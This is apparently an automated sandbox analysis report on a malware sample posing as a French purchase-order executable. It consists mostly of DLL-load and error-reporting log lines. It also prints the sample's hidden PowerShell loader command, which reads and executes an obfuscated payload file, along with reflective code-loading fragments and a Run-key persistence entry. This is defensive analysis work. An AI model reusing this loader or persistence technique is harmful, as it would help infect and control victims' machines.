Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winmm.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2923098281.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2926478638.0000000008029000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2923098281.0000000006F08000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.2927351766.0000000009F92000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Noctilucan $Draine $Grimmere), (Piliganin @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Flirtet = [AppDomain]::CurrentDomain.GetAssemblies()$global:vimfu
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skovsneppes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Obstetrik, $false).DefineType($Rumbaing, $Coc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406009
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089E2E9C push edi; iretd 2_2_089E2EA6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089E148E push 4F85126Ch; ret 2_2_089E149B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089E24EB push ebp; ret 2_2_089E24EC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089E1795 pushfd ; iretd 2_2_089E1796
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089E17B5 push eax; retf 2_2_089E182B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089E0743 push ecx; ret 2_2_089E075C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_04162E9C push edi; iretd 7_2_04162EA6
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_0416148E push 4F85126Ch; ret 7_2_0416149B
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_041624EB push ebp; ret 7_2_041624EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_04160743 push ecx; ret 7_2_0416075C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_04161795 pushfd ; iretd 7_2_04161796
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_041617B5 push eax; retf 7_2_0416182B
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | File created: \commande no 00007 de m.n.s. s.a. 24000127 mns distribution.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
            Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Emraud
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
